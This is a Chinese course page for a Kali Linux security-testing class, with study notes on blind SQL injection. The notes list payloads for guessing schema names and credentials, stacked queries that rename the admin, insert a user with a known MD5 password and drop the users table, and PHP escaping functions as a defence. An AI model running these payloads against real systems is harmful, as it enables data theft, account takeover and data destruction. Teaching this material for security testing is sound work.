846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

SQL注入

无法读取information schema库

拒绝union、order by语句

 猜列名:'and column is null--+

 猜当前表名:'and table.user is null--+

 猜库名: 'and .dbname.table.user is null--+

 猜库里其他表: 'and (select count(*) from table)>0--+

 列表对应关系:'and users.user is null--+

 猜字段内容

 'or user -'admin

 'or user like '%a%

 猜账号对应密码

 'or user-'admin' and password='MD5值'

 

 当前库可写(直接去修改密码,用一段新的MD5去替换旧的密文)

 非交互模式下,可能无法多条语句执行

 执行失败,数据库客户端问题

 '; update users set user='yuanfh' where user='admin

 '; INSERT INTO users (' user_id',' first_name',' last_name',' user','password','avatar') VALUES (‘35',‘fh',‘yuan',‘yfh','5f4dcc3b5aa765d61d8327deb882cf99','OK');--+

 危险

 '; DROP TABLE users; --

SQLi没有通用方法,原理,变通,各种特性

 

mysql_real_escape_string()

stripslashes() 删掉右斜线

php内置过滤函数 转义

php5弃用 php7删除代之以mysqli()、

 

 

[展开全文]